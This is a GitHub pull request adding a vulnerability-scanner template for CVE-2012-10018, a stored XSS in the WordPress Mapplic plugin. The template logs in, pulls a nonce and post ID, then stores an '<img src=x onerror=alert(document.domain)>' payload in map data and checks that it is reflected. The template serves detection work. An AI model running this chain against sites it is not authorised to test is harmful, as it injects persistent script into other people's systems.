Skip to content

Add CVE-2012-10018 detection template #14479

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
pussycat0x merged 11 commits into from
Jan 8, 2026
Merged

Add CVE-2012-10018 detection template #14479

Changes from all commits
Commits
Show all changes
11 commits
Select commit Hold shift + click to select a range
7c5a44f
Add CVE-2012-10018 detection template
KrE80r Dec 20, 2025
d7b05da
Update CVE-2012-10018 template with correct exploitation method
KrE80r Dec 20, 2025
11daf94
Adopt a 5-step approach
KrE80r Dec 20, 2025
1d9df55
Add headless template and payload for XSS execution.
KrE80r Dec 22, 2025
4143f66
Merge branch 'projectdiscovery:main' into add-cve-2012-10018
KrE80r Dec 24, 2025
d11d5dd
remove headless template and add flow conditions
KrE80r Dec 24, 2025
fba20f7
Strengthen matchers to avoid honeypot false positives
KrE80r Dec 24, 2025
c17a750
Added internal:true
KrE80r Dec 24, 2025
7198070
Remove deprecated cookie-reuse, use DSL matchers
KrE80r Dec 24, 2025
2cc6126
Consolidate body matchers using contains_all
DhiyaneshGeek Jan 5, 2026
610373b
Update CVE-2012-10018.yaml
pussycat0x Jan 8, 2026
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
107 changes: 107 additions & 0 deletions http/cves/2012/CVE-2012-10018.yaml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,107 @@
id: CVE-2012-10018

info:
name: WordPress Mapplic <= 6.1 / Mapplic Lite <= 1.0 - Authenticated Stored XSS via SVG File Upload
author: KrE80r
severity: high
description: |
The Mapplic and Mapplic Lite plugins for WordPress are vulnerable to Stored Cross-Site Scripting via arbitrary URL injection in versions up to and including 6.1 and 1.0 respectively. Authenticated users with author-level permissions can inject arbitrary remote URLs for SVG map files. When a user views the map (admin panel or frontend page with shortcode), the browser fetches the SVG via jQuery .load() and inserts it into the DOM. If the SVG contains embedded JavaScript, it executes as XSS.
impact: |
An attacker with author-level access can inject URLs pointing to malicious SVG files containing JavaScript payloads. When any user views the map, the browser loads the SVG and executes the embedded scripts, potentially leading to session hijacking, privilege escalation, or complete site compromise.
remediation: |
Update Mapplic to version 7.0 or later, and Mapplic Lite to version 1.0.1 or later.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2012-10018
- https://wpscan.com/vulnerability/7bdee32b-9036-4e13-9586-4d6a9a1159c6/
- https://patchstack.com/database/wordpress/plugin/mapplic-lite/vulnerability/wordpress-mapplic-lite-plugin-1-0-stored-cross-site-scripting-xss-injection-via-server-side-request-forgery-ssrf-vulnerability
- https://packetstormsecurity.com/files/161920/WordPress-Mapplic-6.1-SSRF-Cross-Site-Scripting.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id: CVE-2012-10018
cwe-id: CWE-79
epss-score: 0.00045
epss-percentile: 0.17483
cpe: cpe:2.3:a:mapplic:mapplic:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 4
vendor: mapplic
product: mapplic
tags: cve,cve2012,wordpress,wp-plugin,xss,mapplic,kev,vkev,authenticated

flow: http(1) && http(2) && http(3) && http(4)

http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check

log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

matchers:
- type: dsl
dsl:
- status_code == 302
- contains(header, "wordpress_logged_in")
condition: and
internal: true

- raw:
- |
GET /wp-admin/post-new.php?post_type=mapplic_map HTTP/1.1
Host: {{Hostname}}

matchers:
- type: dsl
dsl:
- status_code == 200
- contains_all(body, "name=\"_wpnonce\"","post_ID")
condition: and
internal: true

extractors:
- type: regex
name: nonce
part: body
group: 1
regex:
- 'name="_wpnonce" value="([a-f0-9]+)"'
internal: true

- type: regex
name: post_id
part: body
group: 1
regex:
- 'name=.post_ID. value=.(\d+).'
internal: true

- raw:
- |
POST /wp-admin/post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

_wpnonce={{nonce}}&post_ID={{post_id}}&post_title=Test&mapplic-mapdata=%7B%22mapwidth%22%3A%22100%22%2C%22mapheight%22%3A%22100%22%2C%22levels%22%3A%5B%7B%22id%22%3A%22test%22%2C%22title%22%3A%22%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E%22%2C%22map%22%3A%22test.svg%22%7D%5D%7D&action=editpost&post_type=mapplic_map

matchers:
- type: dsl
dsl:
- status_code == 302
internal: true

- raw:
- |
GET /wp-admin/post.php?post={{post_id}}&action=edit HTTP/1.1
Host: {{Hostname}}

matchers:
- type: dsl
dsl:
- status_code == 200
- contains_all(body, "<img src=x onerror=alert(document.domain)>", "mapplic-mapdata")
condition: and
Loading